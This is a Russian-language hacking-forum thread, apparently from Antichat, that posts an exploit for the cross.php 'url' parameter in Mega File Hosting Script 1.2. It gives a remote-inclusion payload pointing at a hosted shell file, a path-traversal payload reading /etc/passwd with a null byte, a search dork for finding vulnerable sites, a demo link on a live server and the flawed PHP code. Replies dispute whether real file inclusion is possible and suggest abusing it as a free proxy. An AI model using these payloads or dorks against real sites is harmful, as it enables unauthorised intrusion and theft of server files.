Форум АНТИЧАТ - Mega File Hosting [ RFI/ LFI ]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Mega File Hosting [ RFI/ LFI ] (https://forum.antichat.xyz/showthread.php?t=111709)

Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability

удаленный / локальный файл включения

для 1.2 версий :)

#############################################
# Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability #
# Home: #
# Www.hacking.ge #
#############################################

#############################################
Просто помимо этого Exploit и наслаждайтесь #
#############################################

RFI: /cross.php?url=http://site.ru/shell.txt

LFI: /cross.php?url=../../../../../../../../etc/passwd%00

#############################################
#
Author: Garry /// 25/02/2009 #
#
#############################################

с доркам та все понятно("Powered by: MFH v1"), life example где? скока не гуглил не нащел cross.php?url=, в каком собствено каталоге лежит cross.php? Имхо [:](||||||)[:].
ТС покажи где он тут http://sharemee.co.uk/ например

Дорк на Mega file hosting сайта:

"Powered by: MFH " :)

Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif

&

и локальный файл включения в Linux-сервер:

cross.php?url=../../../../../../../../etc/passwd%00 :)

Это код из cross.php

PHP код:


		
			
if(function_exists('curl_init'))

{

    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']);

    curl_setopt($ch, CURLOPT_HEADER, 0);

    curl_exec($ch);

    curl_close($ch);

}

elseif(ini_get('allow_url_fopen'))

{

    echo file_get_contents( ($url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']) );

}

}

Цитата:

Сообщение от GarryCka

Че та я сомневаюсь про локальные файлы, да и это не RFI - remote file include - там нету иньекта а просто чтения файла и скорее всего не локального а удаленого, да и зачем %00 ? В http://forum.antichat.ru/antichat/pic/logo.gif судя по этому ничего не добавялеться, короче скорее всего удаленые файлы просто читаються и все.

UPD покамись писал jokester все подтвердил ТС это баян, разве что как прокси использовать, вот так будет не плохая идея насчет прокси халявных

jokester

Да, это ошибка основана на меня

Цитата:

Сообщение от GarryCka

jokester

Да, это ошибка основана на меня

Не понял фразы поясни пожалуйста